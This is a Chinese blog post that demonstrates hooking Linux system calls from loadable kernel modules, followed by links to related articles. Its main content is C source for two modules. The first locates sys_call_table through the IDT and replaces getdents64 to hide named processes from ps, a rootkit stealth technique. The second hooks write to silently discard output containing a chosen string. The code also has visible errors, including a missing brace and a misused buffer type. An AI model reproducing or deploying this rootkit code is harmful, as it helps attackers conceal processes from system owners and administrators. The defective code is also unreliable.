linux下 hook 系统调用示例

最新推荐文章于 2022-09-06 17:32:33 发布
最新推荐文章于 2022-09-06 17:32:33 发布
阅读量2.3k 收藏 1
点赞数 1
分类专栏: linux学习 文章标签: linux hook struct table descriptor module

原理很简单,Linux查看进程的命令ps是通过系统调用sys_getdents实现,sys_getdents用户获取一个指定路径下的目录条目,实际上就是枚举

  /proc/ 下的pid,这样我们只需要hook一下sys_getdents,把相应的要隐藏的pid信息去掉即可。

  以下是LKM代码,在Linux-2.6.14测试并运行成功

  #include <linux/module.h>

  #include <linux/kernel.h>

  #include <asm/unistd.h>

  #include <linux/types.h>

  #include <linux/dirent.h>

  #include <linux/string.h>

  #include <linux/file.h>

  #include <linux/fs.h>

  #define CALLOFF 100

  //使用模块参数来定义需要隐藏的进程名

  char *processname;

  module_param(processname, charp, 0);

  struct {

  unsigned short limit;

  unsigned int base;

  } __attribute__ ((packed)) idtr;

  struct {

  unsigned short off1;

  unsigned short sel;

  unsigned char none,

  flags;

  unsigned short off2;

  } __attribute__ ((packed)) * idt;

  void** sys_call_table;

  asmlinkage long (*orig_getdents)(unsigned int fd, struct linux_dirent64 __user *dirp, unsigned int count);

  char * findoffset(char *start)

  {

  char *p;

  for (p = start; p < start + CALLOFF; p++)

  if (*(p + 0) == '\xff' && *(p + 1) == '\x14' && *(p + 2) == '\x85')

  return p;

  return NULL;

  }

  int myatoi(char *str)

  {

  int res = 0;

  int mul = 1;

  char *ptr;

  for (ptr = str + strlen(str) - 1; ptr >= str; ptr--) {

  if (*ptr < '0' || *ptr > '9')

  return (-1);

  res += (*ptr - '0') * mul;

  mul *= 10;

  }

  return (res);

  }

  struct task_struct *get_task(pid_t pid)

  {

  struct task_struct *p = get_current(),*entry=NULL;

  list_for_each_entry(entry,&(p->tasks),tasks)

  {

  if(entry->pid == pid)

  {

  printk("pid found\n");

  return entry;

  }

  }

  return NULL;

  }

  static inline char *get_name(struct task_struct *p, char *buf)

  {

  int i;

  char *name;

  name = p->comm;

  i = sizeof(p->comm);

  do {

  unsigned char c = *name;

  name++;

  i--;

  *buf = c;

  if (!c)

  break;

  if (c == '\\') {

  buf[1] = c;

  buf += 2;

  continue;

  }

  if (c == '\n') {

  buf[0] = '\\';

  buf[1] = 'n';

  buf += 2;

  continue;

  }

  buf++;

  }

  while (i);

  *buf = '\n';

  return buf + 1;

  }

 int get_process(pid_t pid)

  {

  struct task_struct *task = get_task(pid);

  char *buffer[64] = {0};

  if (task)

  {

  get_name(task, buffer);

  if(strstr(buffer,processname))

  return 1;

  else

  return 0;

  }

  else

  return 0;

  }

  asmlinkage long hacked_getdents(unsigned int fd, struct linux_dirent64 __user *dirp, unsigned int count)

  {

  //added by lsc for process

  long value;

  struct inode *dinode;

  int len = 0;

  int tlen = 0;

  struct linux_dirent64 *mydir = NULL;

  //end

  //在这里调用一下sys_getdents,得到返回的结果

  value = (*orig_getdents) (fd, dirp, count);

  tlen = value;

  //遍历得到的目录列表

  while(tlen > 0)

  {

  len = dirp->d_reclen;

  tlen = tlen - len;

  printk("%s\n",dirp->d_name);

  //在proc文件系统中,目录名就是pid,我们再根据pid找到进程名

  if(get_process(myatoi(dirp->d_name)) )

  {

  printk("find process\n");

  //发现匹配的进程,调用memmove将这条进程覆盖掉

  memmove(dirp, (char *) dirp + dirp->d_reclen, tlen);

  value = value - len;

  }

  if(tlen)

  dirp = (struct linux_dirent64 *) ((char *)dirp + dirp->d_reclen);

  }

  return value;

  }

  void **get_sct_addr(void)

  {

  unsigned sys_call_off;

  unsigned sct = 0;

  char *p;

  asm("sidt %0":"=m"(idtr));

  idt = (void *) (idtr.base + 8 * 0x80);

  sys_call_off = (idt->off2 << 16) | idt->off1;

  if ((p = findoffset((char *) sys_call_off)))

  sct = *(unsigned *) (p + 3);

  return ((void **)sct);

  }

  static void filter_exit(void)

  {

  if (sys_call_table)

  sys_call_table[__NR_getdents64] = orig_getdents;

  }

  static int filter_init(void)

  {

  //得到sys_call_table的偏移地址

  sys_call_table = get_sct_addr();

  if (!sys_call_table) {

  printk("get_act_addr(): NULL...\n");

  return 0;

  } else

  printk("sct: 0x%x\n", (unsigned int)sys_call_table);

  //将sys_call_table中注册的系统调用sys_getdents替换成我们自己的函数hack_getdents

  orig_getdents = sys_call_table[__NR_getdents64];

  sys_call_table[__NR_getdents64] = hacked_getdents;

  return 0;

  }

  module_init(filter_init);

  module_exit(filter_exit);

  MODULE_LICENSE("GPL");



还有一个例子

截获write系统调用:

#ifndef MODULE
#define MODULE
#endif
                                                                              
#ifndef __KERNEL__
#define __KERNEL__
#endif 
#include <linux/init.h>
#include <linux/module.h>
#include <linux/version.h>
#include <linux/kernel.h>
#include <asm/unistd.h>
#include <linux/slab.h>
/*
#include <sys/types.h>
#include <asm/fcntl.h>
#include <linux/malloc.h>
#include <linux/types.h>
#include <linux/string.h>
#include <linux/fs.h>
#include <asm/errno.h> 
#include <sys/syscall.h>
*/ 
MODULE_LICENSE("GPL");
struct descriptor_idt
{
        unsigned short offset_low;
        unsigned short ignore1;
        unsigned short ignore2;
        unsigned short offset_high;
};
static struct {
        unsigned short limit;
        unsigned long base;
}__attribute__ ((packed)) idt48;

static unsigned int SYS_CALL_TABLE_ADDR;
void **sys_call_table;
int base_system_call;
int (*orig_write)(unsigned int fd,char *buf,unsigned int count);
unsigned char opcode_call[3]={0xff,0x14,0x85};
int match(unsigned char *source)
{
        int i;
        for(i=0;i<3;i++){
                if(source[i] != opcode_call[i])
                        return 0;
        }
        return 1;
}
int get_sys_call_table(void)
{
        int i,j;
        unsigned char *ins=(unsigned char *)base_system_call;
        unsigned int sct;
                                                                              
        for(i=0;i<100;i++){
                if(ins[i]==opcode_call[0]){
                        if(match(ins+i)){
                                sct=*((unsigned int *)(ins+3+i));
                                printk(KERN_ALERT "sys_call_tabl's address is
0x%X\n",sct);
                                return sct;
                        }
                }
        }
                                                                              
        printk(KERN_ALERT "can't find the address of sys_call_table\n");
        return -1;
}
int hacked_write(unsigned int fd,char *buf,unsigned int count)

 char *hide="hello";

 if(strstr(buf,hide)!=NULL){
  printk(KERN_ALERT "find name.\n");
  return count;
 }
 else{
  return orig_write(fd,buf,count);
 }
}
int init_module(void)
{
        __asm__ volatile ("sidt %0": "=m" (idt48));
        struct descriptor_idt *pIdt80 = (struct descriptor_idt *)(idt48.base + 8*0x80);
        base_system_call = (pIdt80->offset_high<<16 | pIdt80->offset_low);
        printk(KERN_ALERT "system_call address at 0x%x\n",base_system_call);
 SYS_CALL_TABLE_ADDR=get_sys_call_table();
 sys_call_table=(void **)SYS_CALL_TABLE_ADDR;
 orig_write=sys_call_table[__NR_write];
 sys_call_table[__NR_write]=hacked_write;
        return 0;
}
void cleanup_module()
{
 sys_call_table[__NR_write]=orig_write;
}

lingfong_cool
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
linux应用hook实例(含源码分析)
啊渊的专栏
08-12 2564
函数地址替换是最简单的hook方式,在开发的时候发现C开发的程序和C++开发的程序hook还是有差别的。C开发的程序函数几乎是可以直接使用readelf查看,因此在查找函数偏移量的时候相对简单一些,但是如果是C++开发无法直接使用readelf命令查看函数地址,因此需要动态跟踪函数地址,找到函数偏移量然后针对该函数地址进行hook。..............................
netfilter hook 注册,调用示例
08-17
Linux4.x内核编程实战——netfilter hook 注册,调用示例.nf_hook_ops,nf_register_net_hook, nf_unregister_net_hook 使用
Linux hook 技术一个简单demo分析
weixin_42136255的博客
08-10 754
hook技术分享
linux hook方法整理
jinking01的专栏
09-06 1529
linux上使用hook的方法总结
linux hook
cncnlg的专栏
05-21 4115
目录 1. 系统调用Hook简介 2. Ring3中Hook技术 3. Ring0中Hook技术 4. 后记 1. 系统调用Hook简介 系统调用属于一种软中断机制(内中断陷阱),它有操作系统提供的功能入口(sys_call)以及CPU提供的硬件支持(int 3 trap)共同完成。 我们必须要明白,Hook技术是一个相对较宽的话题,因为操作系统从ring3
简单Linux hook demo
07-07
在"hook_linux"的示例中,可能讲解了如何创建一个内核模块,找到目标系统调用,然后在调用前后插入自定义的处理逻辑。这通常涉及以下几个步骤: 1. **编写内核模块**:使用C语言,遵循内核编程规范,包括模块初始化...
HookDemo系统钩子
03-23
总之,"HookDemo系统钩子"是一个涉及Windows编程、系统级交互和安全性的技术示例,通过合理利用,可以实现各种高级功能,但同时也需要注意其潜在的风险和限制。在实际应用中,开发者应具备扎实的编程基础和对系统...
Android Hook 技术之 绕过系统对Activity验证
07-18
2. **系统Hook**:更深层次的Hook可能涉及到Linux内核和Android Framework。例如,我们可以使用Xposed框架,这是一个知名的Android Hook工具,它允许开发者在系统级拦截并修改系统调用。通过Xposed,我们可以找到...
基于X11的Linux下的全局键鼠监控方法,只能获得键鼠动作,但是不能拦截,代码可直接运行
09-24
Linux系统中,尤其是基于X Window System(简称为X11)的桌面环境中,实现全局键鼠监控是一项常见的需求,例如用于开发系统监控工具、自动化脚本或游戏辅助程序等。X11提供了丰富的API接口,允许开发者监听并处理...
高级Linux kernel inline hook技术
lucien的博客
05-08 5227
==Ph4nt0m Security Team== Issue 0x02, Phile #0x05 of 0x0A |=---------------------------------------------------------------------------=| |=-------------------=[ 高级Linux kernel inline hook技术
Linux平台下hook技术研究
qazw9600的专栏
07-01 415
说明 之前公司,C项目中为了程序检测内存泄漏问题,采用一个自己实现的库,能够记录内存分配和释放操作,程序结束或者通过信号可以生成dump信息来分析内存问题。 技术分析 内存分配和释放记录主要是通过hook(钩子)技术来获取的。 hook技术 通过预处理实现 实现方式: 创建一个头文件,通过宏替换的方式替换掉内存分配(malloc,calloc,realloc)和释放函数(free)。 创建一个源文件,定义替换函数,在替换函数中记录调用调用真正的目标函数和做相应处理。 代码示例: * 头
Linux下C++中可使用的3种Hook方法
网络资源是无限的
12-05 6589
Hook即钩子,截获API调用的技术,是将执行流程重定向到你自己的代码,类似于hack。如使程序运行时调用你自己实现的malloc函数代替调用系统库中的malloc函数。这里介绍下Linux下C++中可使用的3中Hook方法: 1. GNU C库允许你通过指定适当的钩子函数(hook function)来修改malloc、realloc和free的行为,钩子函数的声明在malloc.h文件中,如__malloc_hook, __free_hook,你可以使用这些钩子来帮助你调试使用...
Linux下C++中可使用的3中Hook方法
jinking01的专栏
09-06 741
Linux下C++中可使用的3中Hook方法
linux 系统调用 hook 总结
whatday的专栏
09-02 5160
1. 系统调用Hook简介 系统调用属于一种软中断机制(内中断陷阱),它有操作系统提供的功能入口(sys_call)以及CPU提供的硬件支持(int 3 trap)共同完成。 我们必须要明白,Hook技术是一个相对较宽的话题,因为操作系统从ring3到ring0是分层次的结构,在每一个层次上都可以进行相应的Hook,它们使用的技术方法以及取得的效果也是不尽相同的。本文的主题是"系统调用的Hoo...
Linux下的网络HOOK实现以及使用方法
liyuan0714的专栏
03-16 2031
最近疯狂的研究Linux的种种功能,也颇有心得,这里讲述一下Linux下的Net的Hook,使用net的Hook可以实现很多很多非常底层的功能,比如过滤报文,做防火墙,做代理等等。 Now,Let's Go! 使用的是Linux 2.6.19.1的内核代码。 首先是 在./Source/net/netfilter/core.c文件中的函数 nf_register_hook: static
linux 内核开发 hook,Linux内核hook 演示
weixin_34997870的博客
04-30 168
我以前利用0x80中断程序找到system_call然后找到 sys_call_table的方法,现在试下hook系统调用sys_mkdir来阻止创建目录小试牛刀。#include #include #include #include #include #include MODULE_LICENSE("Dual BSD/GPL");#define _DEBUG#ifdef _DEBUG#defin...
linux内核hook方式
faxiang1230的专栏
07-02 1544
翻译:https://www.apriorit.com/dev-blog/544-hooking-linux-functions-1 我们最近在开展linux系统上安全相关的工作,在上面我们需要hook内核中重要的函数调用,例如打开文件、创建进程。 我们需要这样一个项目来监控系统的活动并且阻塞可疑的进程。 实际上,最后我们采用了一种高效的方式hook系统,借助于ftrace系统,可以通过函数...
linux hook 任意内核函数,linux内核中的hook函数详解
weixin_28766581的博客
05-02 173
在编写linux内核中的网络模块时,用到了钩子函数也就是hook函数。现在来看看linux是如何实现hook函数的。先介绍一个结构体:struct nf_hook_ops,这个结构体是实现钩子函数必须要用到的结构体,其实际的定义为:其中的成员信息为:hook :是一个函数指针,可以将自定义的函数赋值给它,来实现当有数据包到达是调用你自定义的函数。自定义函数的返回值为:owner:是模块的所有者,...
inline hook look_up系统调用,代码实现
最新发布
04-29
以下是一个简单的代码示例,用于 inline hook look_up 系统调用: ```c #include <linux/kernel.h> #include <linux/module.h> #include <linux/kprobes.h> #include <linux/unistd.h> static int my_look_up...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值